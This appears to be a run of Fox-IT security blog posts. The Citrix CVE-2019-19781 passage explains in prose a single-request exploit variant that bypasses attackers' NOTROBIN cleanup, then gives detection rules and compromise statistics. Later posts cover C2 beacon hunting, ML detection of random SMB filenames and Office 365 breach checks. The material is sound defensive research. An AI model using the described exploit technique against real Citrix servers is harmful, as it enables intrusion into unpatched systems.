This means that our XML file is written just before the requested file is rendered. What if we craft a HTTP request that both writes and requests our XML file? The following screenshot shows how this works. First we send our crafted NSC_USER header, whilst also requesting the same file within the GET request path. This results in the XML file being first written, and then rendered straight afterwards, leading to code execution in a single HTTP request, without any vulnerable Perl file!

Successful Exploitation with Single Request

Note that aside from bypassing adversary patches that delete the “vulnerable” Perl files such as from the server, this method will also bypass the NOTROBIN method of checking for (and deleting) XML files within the template directory. This is due to a race-condition in that our XML file is written and rendered within the same request, and thus executed before it can be deleted.

Some Final Questions

Now we’ve shown a new method to exploit the vulnerability, and how to bypass adversary patches. However, we still have some other questions to answer.

Does the Citrix/FireEye IOC scanner detect this method?

Yes, it does. This is because their success_regexes[0] regex takes care of detecting any request (regardless of HTTP request method or version) that requests a file ending with .xml, which is a constraint of the vulnerability, and something which we cannot, as an attacker, control. The script additionally looks for responses with a 304 status code, which addresses a simple bypass technique of specifying an If-None-Match: * header to solicit a 304 instead of 200 status code.

Successful Detection via Regex

Furthermore, unless the attacker deletes the dropped .xml and compiled .ttc2 files, these will also be present on the filesystem and detectable via the IOC checker script. The following screenshot shows the Citrix/FireEye IOC scanner detecting exploitation via this technique:

IOC Scanner Detection

Readers may have read in FireEye’s “404 Exploit Not Found” blog post that the attacker behind the NOTROBIN attacks also used a single HTTP request method to exploit the issue. Our understanding is that this is not the same technique. The reason for this is that FireEye describes the attacker requesting Perl script via a POST request, resulting in a 304 response (presumably using the If-None-Match/If-Modified-Since trick). Discounting the fact that the request method can be arbitrary, our method does not make use of the file.

FireEye “404 Exploit Not Found” Blog

How can the single request exploit be detected?

As demonstrated above, the Citrix/FireEye IOC scanner still detects the single request variant from an endpoint perspective. Looking at the constraints of this new exploitation method, plus everything we have learned about obfuscation of request methods etc., we know that the request must:

  1. Contain `/vpns/portal/` within the path of the request
  2. Contain an `NSC_USER` header with a traversal `../` sequence
  3. End with `.xml`

However may:

  1. Be any request method type (e.g. `GET`, `HEAD`, `PUT`, `FOO`, `BAR`)
  2. Be split into multiple requests, e.g. one request to trigger the XML file drop, another to the XML (similar to the original exploit)
  3. Result in a 200 response, but could also result in a 304
  4. Contain a traversal `../` sequence in the request path – this depends on whether the request is made to the management or virtual IP interface

Finally, another question you may be wondering – perhaps you are worried that you applied the Citrix mitigation too late, and that an attacker may have “adversary patched” your Citrix server for you. Of course, in this scenario, the best course of action is to complete an examination of the server to identify any potential backdoors or attacker-deployed patches. For this, we thoroughly recommend the official IOC script provided by Citrix/FireEye. However, given that logs typically only persist for a couple of days, and that sophisticated actors may remove logs, it can be difficult to ascertain the level of intrusion by only looking at the Citrix device itself. If your device was patched after public exploits were released, it is highly likely that the device was compromised.



Latest Statistics

Here are the latest statistics based on the latest available data (as of June 2020):



Patched (but backdoored) vs. Unpatched (but backdoored)
  • 8115 servers were identified that are still vulnerable to CVE-2019-19781
  • Of the 8115 vulnerable servers, 2508 (30.9%) have indicators of adversary patching
    • These 2508 servers remain vulnerable due to the new discovery of the exploit method described in this blog
  • A total of 3,332 unique servers were identified to contain known indicators of compromise
  • 23% of the compromised servers had been officially patched, but were still backdoored
  • Many hosts contained multiple indicators and backdoors from distinct actors, in some cases up to 5 different indicators were observed
  • 49% of compromised devices were located in the US



Breakdown by Country

It has been just over six months since CVE-2019-119781 was first announced, and a mitigation made available. Yet the number of vulnerable and compromised found in the data based on in-the-wild hosts, is shockingly high. Furthermore, whilst we have been able to identify a subset of compromised devices, the true number is likely much higher. This is due to a number of reasons. Firstly, we were only able to observe a limited number of known IoCs, not all of which can be observed based on the datasets we have access to. Secondly the majority of the backdoors and webshells we’ve seen deployed still operate perfectly fine even after the server has been patched. These backdoors typically require no authentication or use a hardcoded password – meaning that anyone could use them as a method to gain remote access. We just don’t have a way of identifying the true number of patched-but-backdoored devices out there. Therefore, we believe that our statistics represent just the tip of the iceberg.

It can no longer be assumed that just because a device was patched, that it does not remain compromised. Nor can it be assumed that if a device was compromised and “patched” by one attacker, that it cannot be compromised by another attacker using the technique described in this publication. Not all attackers share the same motives. Whilst the MO of attackers deploying adversary patching might simply be to “hoard” access until later, other attackers may have more insidious, immediate motives, such as financial gain through ransomware. The most likely reason we haven’t seen many more backdoors deployed in the wild is due to adversary patching. However, as we have demonstrated – this provides both a false sense of security and obscures the true number of compromised devices that may be out there.

We hope that this publication helps to highlight the issue and provide additional visibility into techniques being used in the wild, as well as dispelling a few misconceptions about the vulnerability itself and demonstrates more robust ways to detect exploit variants. We urge organizations to ensure that their devices are not only patched, but that care is taken to ensure that latent compromises have been identified and remediated.

Hunting for beacons

By: Fox IT
15 January 2020 at 11:29

Author: Ruud van Luijk

Attacks need to have a form of communication with their victim machines, also known as Command and Control (C2) [1]. This can be in the form of a continuous connection or connect the victim machine directly. However, it’s convenient to have the victim machine connect to you. In other words: It has to communicate back. This blog describes a method to detect one technique utilized by many popular attack frameworks based solely on connection metadata and statistics, in turn enabling this technique to be used on multiple log sources.

Many attack frameworks use beaconing

Frameworks like Cobalt Strike, PoshC2, and Empire, but also some run-in-the-mill malware, frequently check-in at the C2 server to retrieve commands or to communicate results back. In Cobalt Strike this is called a beacon, but concept is similar for many contemporary frameworks. In this blog the term ‘beaconing’ is used as a general term for the call-backs of malware. Previous fingerprinting techniques shows that there are more than a thousand Cobalt Strike servers online in a month that are actively used by several threat actors, making this an important point to focus on.

While the underlying code differs slightly from tool to tool, they often exist of two components to set up a pattern for a connection: a sleep and a jitter. The sleep component indicates how long the beacon has to sleep before checking in again, and the jitter modifies the sleep time so that a random pattern emerges. For example: 60 seconds of sleep with 10% jitter results in a uniformly random sleep between 54 and 66 seconds (PoshC2 [3], Empire [4]) or a uniformly random sleep between 54 and 60 seconds (Cobalt Strike [5]). Note the slight difference in calculation.

This jitter weakens the pattern but will not dissolve the pattern entirely. Moreover, due to the uniform distribution used for the sleep function the jitter is symmetrical. This is in our advantage while detecting this behaviour!

Detecting the beacon

While static signatures are often sufficient in detecting attacks, this is not the case for beaconing. Most frameworks are very customizable to your needs and preferences. This makes it hard to write correct and reliable signatures. Yet, the pattern does not change that much. Therefore, our objective is to find a beaconing pattern in seemingly pattern less connections in real-time using a more anomaly-based method. We encourage other blue teams/defenders to do the same.

Since the average and median of the time between the connections is more or less constant, we can look for connections where the times between consecutive connections constantly stay within a certain range. Regular traffic should not follow such pattern. For example, it makes a few fast-consecutive connections, then a longer time pause, and then again, some interaction. Using a wider range will detect the beacons with a lot of jitter, but more legitimate traffic will also fall in the wider range. There is a clear trade-off between false positives and accounting for more jitter.

In order to track the pattern of connections, we create connection pairs. For example, an IP that connects to a certain host, can be expressed as ’ ->”. This is done for all connection pairs in the network. We will deep dive into one connection pair.

The image above illustrates a beacon is simulated for the pair ’ ->” with a sleep of 1 second and a jitter of 20%, i.e. having a range between 0.8 and 1.2 seconds and the model is set to detect a maximum of 25% jitter. Our model follows the expected timing of the beacon as all connections remain within the lower and upper bound. In general, the more a connection reside within this bandwidth, the more likely it is that there is some sort of beaconing. When a beacon has a jitter of 50% our model has a bandwidth of 25%, it is still expected that half of the beacons will fall within the specified bandwidth.

Even when the configuration of the beacon changes, this method will catch up. The figure above illustrates a change from one to two seconds of sleep whilst maintaining a 10% beaconing. There is a small period after the change where the connections break through the bandwidth, but after several connections the model catches up.

This method can work with any connection pair you want to track. Possibilities include IPs, HTTP(s) hosts, DNS requests, etc. Since it works on only the metadata, this will also help you to hunt for domain fronted beacons (keeping in mind your baseline).

Keep in mind the false positives

Although most regular traffic will not follow a constant pattern, this method will most likely result in several false positives. Every connection that runs on a timer will result in the exact same pattern as beaconing. Example of such connections are windows telemetry, software updates, and custom update scripts. Therefore, some baselining is necessary before using this method for alerting. Still, hunting will always be possible without baselining!


Hunting for C2 beacons proves to be a worthwhile exercise. Real world scenarios confirm the effectiveness of this approach. Depending on the size of the network logs, this method can plow through a month of logs within an hour due to the simplicity of the method. Even when the hunting exercise did not yield malicious results, there are often other applications that act on specific time intervals and are also worth investigating, removing, or altering. While this method will not work when an adversary uses a 100% jitter. Keep in mind that this will probably annoy your adversary, so it’s still a win!







Detecting random filenames using (un)supervised machine learning

By: Fox IT
16 October 2019 at 11:00

Combining both n-grams and random forest models to detect malicious activity.

Author: Haroen Bashir

An essential part of Managed Detection and Response at Fox-IT is the Security Operations Center. This is our frontline for detecting and analyzing possible threats. Our Security Operations Center brings together the best in human and machine analysis and we continually strive to improve both. For instance, we develop machine learning techniques for detecting malicious content such as DGA domains or unusual SMB traffic. In this blog entry we describe a possible method for random filename detection.

During traffic analysis of lateral movement we sometimes recognize random filenames, indicating possible malicious activity or content. Malicious actors often need to move through a network to reach their primary objective, more popularly known as lateral movement [1].

There is a variety of routes for adversaries to perform lateral movement. Attackers can use penetration testing frameworks such as Metasploit [3] or Microsoft Sysinternal application PsExec. This application creates the possibility for remote command execution over the SMB protocol [4].

Due to its malicious nature we would like to detect lateral movement as quickly as possible. In this blogpost we build on our previous blog entry [2] and we describe how we can apply the magic of machine learning in detection of random filenames in SMB traffic.

Supervised versus unsupervised detection models 

Machine learning can be applied in various domains. It is widely used for prediction and classification models, which suits our purpose perfectly. We investigated two possible machine learning architectures for random filename detection.

The first detection method for random filenames is set up by creating bigrams of filenames,  which you can find more information about in our previous post [2]. This detection method is based on unsupervised learning. After the model learns a baseline of common filenames, it can now detect when filenames don’t belong in its learned baseline.

This model has a drawback; it requires a lot of data. The solution can be found with supervised machine learning models. With supervised machine learning we feed a model data whilst simultaneously providing the label of the data. In our current case, we label data as either random or not-random.

A powerful supervised machine learning model is the random forest. We picked this architecture as it’s widely used for predictive models in both classification and regression problems. For an introduction into this technique we advise you to see [4]. The random forest is based on multiple decision trees, increasing the stability of a detection model. The following diagram illustrates the architecture of the detection model we built.

Similar to the first model, we create bigrams of the filenames. The model cannot train on bigrams however, so we have to map the bigrams into numerical vectors. After training and testing the model we then focus on fine-tuning hyperparameters. This is essential for increasing the stability of the model. An important hyperparameter of the random forest is depth. A greater depth will create more decision splits in the random forest, which can easily cause overfitting. It is therefore highly desirable to keep the depth as low as possible, whilst simultaneously maintaining high precision rates.Results

Proper data is one of the most essential parts in machine learning. We gathered our data by scraping nearly 180.000 filenames from SMB logs of our own network. Next to this, we generated 1.000 random filenames ourselves. We want to make sure that the models don’t develop a bias towards for example the extension “.exe”, so we stripped the extensions from the filenames.

As we stated earlier the bigrams model is based on our previously published DGA detection model. This model has been trained on 90% percent of filenames. It is then tested on the remaining filenames and 100% of random filenames.

The random forest has been trained and tested in multiple folds, which is a cross validation technique[6]. We evaluate our predictions in a joint confusion matrix which is illustrated below.

True positives are shown in the upper right column, the bigrams model detected 71% of random filenames and the random forest detected 81% of random filenames. As you can see the models produce low false positive rates, in both models ~0% of not random filenames have been incorrectly classified as random. This is great for use in our Security Operations Center, as this keeps the workload on the analysts consistent.

The F1-scores are 0.83 and 0.89 respectively. Because we focus on adding detection with low false positive rates, it is not our priority to reduce the false negative rates. In future work we will take a better look at the false negative rates of the models.

We were quite interested in differences in both detection models. Looking at the visualization below we can observe that both models equally detect 572 random filenames. They separately detect 236 and 141 random filenames respectively. The bigrams model might miss more random filenames due to its unsupervised architecture. It is possible that the bigrams model requires more data to create it’s baseline and therefore doesn’t perform as well as the supervised random forest.The overlap in both models and the low false positive rate gave us the idea to run both these models cooperatively for detection of random filenames. It doesn’t cost much processing and we would gain a lot! In practical setting this would mean that if a random filename slips by one detection model, it is still possible for the other model to detect this. In theory, we detect 90% of random filenames! The low false positive rates and complementary aspects of the detection models indicate that this setup could be really useful for detection in our Security Operations Center.


During traffic analysis in our Security Operations Center we sometimes recognize random filenames, indicating possible lateral movement. Malicious actors can use penetration testing frameworks (e.g. Metasploit) and Microsoft processes (e.g. PsExec) for lateral movement. If adversaries are able to do this, they can easily compromise a (sub)network of a target. Needless to say that we want to detect this behavior as quickly as possible.

In this blog entry we described how we applied machine learning in order to detect these random filenames. We showed two models for detection: a bigrams model and a random forest. Both these models yield good results in testing stage, indicated by the low false positive rates. We also looked at the overlap in predictions from which we concluded that we can detect 90% of random filenames in SMB traffic! This gave us the idea to run both detection models cooperatively in our Security Operations Center.

For future work we would like to research the usability of these models on endpoint data, as our current research is solely focused on detection in network traffic. There is for instance lots of malware that outputs random filenames on a local machine. This is just one of many possibilities which we can better investigate.

All in all, we can confidently conclude that machine learning methods are one of many efficient ways to keep up with adversaries and improve our security operations!



[1] –

[2] –

[3] –

[4] –

[5] –

[6] –






Office 365: prone to security breaches?

By: Fox IT
11 September 2019 at 11:30

Author: Willem Zeeman

“Office 365 again?”. At the Forensics and Incident Response department of Fox-IT, this is heard often.  Office 365 breach investigations are common at our department.
You’ll find that this blog post actually doesn’t make a case for Office 365 being inherently insecure – rather, it discusses some of the predictability of Office 365 that adversaries might use and mistakes that organisations make. The final part of this blog describes a quick check for signs if you already are a victim of an Office 365 compromise. Extended details about securing and investigating your Office 365 environment will be covered in blogs to come.

Office 365 is predictable
A lot of adversaries seem to have a financial motivation for trying to breach an email environment. A typical adversary doesn’t want to waste too much time searching for the right way to access the email system, despite the fact that it is often enough to browse to an address like https://webmail.companyname.tld. But why would the adversary risk encountering a custom or extra-secure web page? Why would the adversary accept the uncertainty of having to deal with a certain email protocol in use by the particular organisation? Why guess the URL? It’s much easier to use the “Cloud approach”.

In this approach, an adversary first collects a list of valid credentials (email address and password), most frequently gathered with the help of a successful phishing campaign. When credentials have been captured, the adversary simply browses to and tries them. If there’s no second type of authentication required, they are in. That’s it. The adversary is now in paradise, because after gaining access, they also know what to expect here. Not some fancy or out-dated email system, but an Office 365 environment just like all the others. There’s a good chance that the compromised account owns an Exchange Online mailbox too.

In predictable environments, like Office 365, it’s also much easier to automate your process of evil intentions. The adversary may create a script or use some tooling, complement it with the gathered list of credentials and sit back. Of course, an adversary may also target a specific on-premises system configuration, but seen from an opportunistic point of view, why would they? According to Microsoft, more than 180 million people are using their popular cloud-based solution. It’s far more effective to try another set of credentials and enter another predictable environment than it is to spend time in figuring out where information might be available, and how the environment is configured.

Office 365 is… secure?
Well, yes, Office 365 is a secure platform. The truth is that it has a lot more easy-to-deploy security capabilities than the most common on-premises solutions. The issue here is that organisations seem to not always realise what they could and should do to secure Office 365.

Best practices for securing your Office 365 environment will be covered in a later blog, but here’s a sneak preview: More than 90% of the Office 365 breaches investigated by Fox-IT would not have happened if the organisation would have had multi-factor authentication in place. No, implementation doesn’t need to be a hassle. Yes, it’s a free to use option. Other security measures like receiving automatic alerts on suspicious activity detected by built-in Office 365 processes are free as well, but often neglected.

Simple preventive solutions like these are not even commonly available in on-premises-situation environments. It almost seems that many companies assume that they can get perfect security right out of the box, rather than configuring the platform to their needs. This may be the reason for organisations to do not even bother configuring Office 365 in a more secure way. That’s a pity, especially when securing your environment is often just a few cloud-clicks away. Office 365 may not be less secure than an on-premises solution, but it might be more prone to being compromised though. Thanks to the lack of involved expertise, and thanks to adversaries who know how to take advantage of this. Microsoft already offers multi-factor authentication to reduce the impact of attacks like phishing. This is great news, because we know from experience that most of the compromises that we see could have been prevented if those companies had used MFA. However, compelling more organisations to adopt it remains an ongoing challenge, and how to drive increased adoption of MFA remains an open question.

A lot of organisations are already compromised. Are you?
At our department we often see that it may take months(!) for an organisation to realise that they have been compromised. In Office 365 breaches, the adversary is often detected due to an action that causes so much noise that it’s no longer possible for the adversary to hide. When the adversary thinks it’s no longer beneficial to persist, the next step is to try to get foothold into another organisation. In our investigations, we see that when this happens, the adversary has already tried reaching a financial goal. This financial goal is often achieved by successfully committing a payment related fraud in which they use an employee’s internal email account to mislead someone. Eventually, to advance into another organisation, a phishing email is sent by the adversary to a large part of the organisation’s address list. In the end, somebody will likely take the bait and leave their credentials on a malevolent and adversary-controlled website. If a victim does, the story starts over again, at the other organisation. For the adversary, it’s just a matter of repeating the steps.

The step to gain foothold in another organisation is also the moment that a lot of (phishing) email messages are flowing out of the organisation. Thanks to Office 365 intelligence, these are automatically blocked if the number of messages surpasses a given limit based on the user’s normal email behaviour. This is commonly the moment where the victim gets in touch with their system administrator, asking why they can’t send any email anymore. Ideally, the system administrator will quickly notice the email messages containing malicious content and report the incident to the security team.

For now, let’s assume you do not have the basic precautions set up, and you want to know if somebody is lurking in your Office 365 environment. You could hire experts to forensically scrutinize your environment, and that would be a correct answer. There actually is a relatively easy way to check if Microsoft’s security intelligence already detected some bad stuff. In this blog we will zoom in on one of these methods. Please keep in mind that a full discussion of these range of the available methods is beyond the scope of this blog post. This blog post describes the method that from our perspective gives quick insights in (afterwards) checking for signs of a breach. The not-so-obvious part of this step is that you will find the output in Microsoft Azure, rather than in Office 365. A big part of the Office 365 environment is actually based on Microsoft Azure, and so is its authentication. This is why it’s usually[1] possible to log in at the Azure portal and check for Risk events.

The steps:

  1. Go to and sign-in with your Office 365 admin account[2]
  2. At the left pane, click Azure Active Directory
  3. Scroll down to the part that says Security and click Risk events
  4. If there are any risky events, these will be listed here. For example, impossible travels are one of the more interesting events to pay attention to. These may look like this:

This risk event type identifies two sign-ins from the same account, originating from geographically distant locations within a period in which the geographically distance cannot be covered. Other unusual sign-ins are also marked by machine learning algorithms. Impossible travel is usually a good indicator that an adversary was able to successfully sign in. However, false positives may occur when a user is traveling using a new device or using a VPN.

Apart from the impossible travel registrations, Azure also has a lot of other automated checks which might be listed in the Risk events section. If you have any doubts about these, or if a compromise seems likely: please get in contact with your security team as fast as possible. If your security team needs help in the investigation or mitigation, contact the FoxCERT team. FoxCERT is available 24/7 by phone on +31 (0)800 FOXCERT (+31 (0)800-3692378).

[1] Disregarding more complex federated setups, and assuming the licensing model permits.

[2] The risky sign-ins reports are available to users in the following roles: Security Administrator, Global Administrator, Security Reader. Source: